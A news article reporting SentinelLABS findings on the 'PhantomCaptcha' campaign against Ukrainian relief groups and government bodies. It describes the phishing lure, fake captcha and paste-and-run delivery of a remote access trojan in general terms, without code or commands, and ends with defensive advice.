A sophisticated cyber operation, dubbed “PhantomCaptcha,” has targeted prominent humanitarian organizations and government entities engaged in war relief efforts in Ukraine, as detailed in recent research by SentinelLABS. The campaign has notably affected major organizations such as the International Red Cross, UNICEF, and the Norwegian Refugee Council, along with various Ukrainian governmental administrations in regions including Donetsk and Dnipropetrovsk.
This coordinated attack was initiated on October 8, 2025, following six months of meticulous infrastructure planning. Despite being operational for just one day, the speed of execution suggests highly skilled perpetrators aiming to evade detection. The attack sequence exhibited characteristics similar to the patterns of COLDRIVER, a group associated with Russia’s FSB intelligence service.
Deceptive Communications and Malicious Payloads
The cyberattack commenced with well-crafted emails allegedly from the Ukrainian President’s Office, containing a malicious PDF file. Clicking a link embedded within this PDF redirected victims to zoomconference.app, a domain masquerading as a legitimate Zoom site. This domain, hosted on a server owned by a Russian provider in Finland, displayed a bogus Cloudflare captcha page designed to arm victims with a covert spying tool.
Further analysis revealed instructions in Ukrainian that prompted users to copy and paste a “token” into the Windows Run command. This tactic, widely known as Paste and Run, exploits users’ actions to unknowingly execute malicious code, often bypassing conventional security measures. The spying tool identified is a multi-stage WebSocket-based Remote Access Trojan (RAT) that grants attackers remote access to the infected system for data exfiltration.
Extensive Planning, Brief Execution
SentinelLABS’ research emphasizes that the attack showcased a high degree of operational planning. While the primary assault lasted merely 24 hours, the command-and-control servers remained active to sustain control over compromised systems. Such short-lived but highly targeted operations underscore the ongoing threat cyber campaigns pose to humanitarian groups, with a glaring focus on obtaining sensitive data.
The researchers further noted associations with a separate mobile campaign deploying counterfeit Android applications, some disguising themselves as adult entertainment platforms or cloud storage services, aimed at harvesting diverse personal information such as users’ locations, SIM details, contacts, photographs, and lists of installed applications.
These incidents highlight the precarious position of relief organizations as direct targets of cyber activities. Employees must adopt a cautious approach towards unexpected communications and refrain from executing directives involving unknown tokens. Should a computer exhibit unusual behavior, it is critical to disconnect it from the network and obtain a professional evaluation.
In instances of such breaches, it is essential to report findings to national CERTs, rotate any compromised credentials, and conduct comprehensive system scans. Implementing foundational security controls, such as multi-factor authentication and restricted administrative rights, can significantly mitigate the risks of these attacks.
